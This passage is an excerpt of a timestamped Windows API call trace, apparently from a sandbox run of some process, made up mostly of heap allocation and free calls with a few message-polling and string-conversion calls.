| out: hHeap=0x25c0000) returned 1 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0254.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.440] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.441] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.442] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.443] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b16b8 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b17c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.445] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0254.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0254.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0254.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b2bb8 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0254.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0254.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.447] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1728 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0254.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0254.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b17c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b17c8 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0254.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.450] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.450] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.450] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 